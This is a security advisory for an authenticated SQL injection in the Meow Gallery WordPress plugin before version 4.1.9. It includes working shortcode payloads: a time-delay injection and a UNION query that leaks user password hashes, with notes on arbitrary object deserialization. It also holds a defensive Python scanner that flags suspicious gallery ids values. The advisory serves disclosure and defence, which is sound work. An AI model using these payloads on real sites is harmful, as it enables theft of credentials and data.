Meow Gallery < 4.1.9 - Contributor+ SQL Injection

Description

The plugin does not sanitise, validate or escape the ids attribute of its gallery shortcode (available to users with a role as low as Contributor) before using it in an SQL statement, leading to an authenticated SQL Injection issue. The injection also allows the returned values to be manipulated in a way that could lead to data disclosure and to arbitrary objects being deserialized.

Proof of Concept

A simple PoC to prove the SQLi: add the following shortcode to a page/post with a role as low as Contributor, then preview/view it and note the 10s delay.

[gallery layout="cascade" ids="1) AND (select*from(select(sleep(10)))a"]

-- Reporter PoC:

This SQL injection allows two things: 1) disclosure of arbitrary contents in SQL tables, and 2) deserialization of arbitrary objects.

To prepare for data disclosure, we first need to get a serialized version of _wp_attachment_metadata. Of course, if you are here for deserialization, this can be replaced with serialization gadgets.

This is the JSON I used for this:

{"width":1,"height":1,"file":"a.png","sizes":{"medium":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"},"thumbnail":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"}},"image_meta":{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0","keywords":[]}}

This can be run through base64_encode(serialize(json_decode(PAYLOAD))) to get the serialized payload.

Shortcode payload for leaking users' password hashes:
[gallery layout="cascade" ids="1) UNION SELECT id,user_pass,FROM_BASE64('BASE64ED_PAYLOAD_SEE_ABOVE') FROM wp_users WHERE id IN (1,2,3,4"]

This should produce HTML like the following (with the base64-encoded payload):
<div class="mgl-row mgl-layout-1-o" data-cascade-layout="o"><div class="mgl-box a"><figure class="mgl-item">
    <div class="mgl-icon">
        <div class="mgl-img-container">
        </div>
    </div>
    <figcaption class="mgl-caption">
        <p>LEAKED PASSWORD HASH/</p>
    </figcaption>
    </figure>
</div></div>
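A defender-side triage check for the vector described above, added here as an example and not part of the advisory or the plugin's code: it scans stored post content (constructed sample posts, not real data) for gallery shortcodes whose ids attribute is anything other than a comma-separated list of integers, which is all a legitimate gallery ever carries. It is a heuristic over the raw text and does not replicate WordPress's own shortcode parser.

```python
import re

# Constructed sample post bodies (not taken from the advisory or any real site):
# one benign gallery, one post mixing a benign gallery with a non-numeric ids value.
SAMPLE_POSTS = {
    101: 'Holiday photos [gallery layout="cascade" ids="12,13,14"] and more text',
    102: 'Team page [gallery ids="7"] plus [gallery layout="tiles" ids="1) AND 1=1 -- "]',
    103: 'No gallery here, just [caption]text[/caption]',
}

# Matches a [gallery ...] shortcode and captures its attribute string.
GALLERY_RE = re.compile(r'\[gallery\b([^\]]*)\]', re.IGNORECASE)
# Extracts the ids attribute value, whether quoted with " or '.
IDS_RE = re.compile(r'''\bids\s*=\s*(["'])(.*?)\1''', re.IGNORECASE)
# A legitimate ids value is a comma-separated list of non-negative integers only.
VALID_IDS_RE = re.compile(r'^\s*\d+(\s*,\s*\d+)*\s*$')


def gallery_ids_values(content):
    """Return the raw ids attribute value of every [gallery] shortcode in content."""
    values = []
    for match in GALLERY_RE.finditer(content):
        ids = IDS_RE.search(match.group(1))
        if ids:
            values.append(ids.group(2))
    return values


def find_suspicious_galleries(posts):
    """Return (post_id, ids_value) for every gallery whose ids attribute is not a plain integer list.

    posts maps a post id to its content, e.g. rows pulled from wp_posts.post_content.
    """
    findings = []
    for post_id, content in posts.items():
        for value in gallery_ids_values(content):
            if not VALID_IDS_RE.match(value):
                findings.append((post_id, value))
    return findings


if __name__ == "__main__":
    for post_id, value in find_suspicious_galleries(SAMPLE_POSTS):
        print(f"post {post_id}: suspicious gallery ids attribute {value!r}")
```

Anything flagged deserves a look at the post's author and revision history as well as the value itself, since a Contributor account is enough to plant such a shortcode.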

Affects Plugins

Fixed in 4.1.9

Classification

Type: SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher: apple502j
Submitter: apple502j
Verified: Yes

Timeline

Publicly Published: 2021-09-02 (about 2 years ago)
Added: 2021-09-02 (about 2 years ago)
Last Updated: 2022-04-08 (about 2 years ago)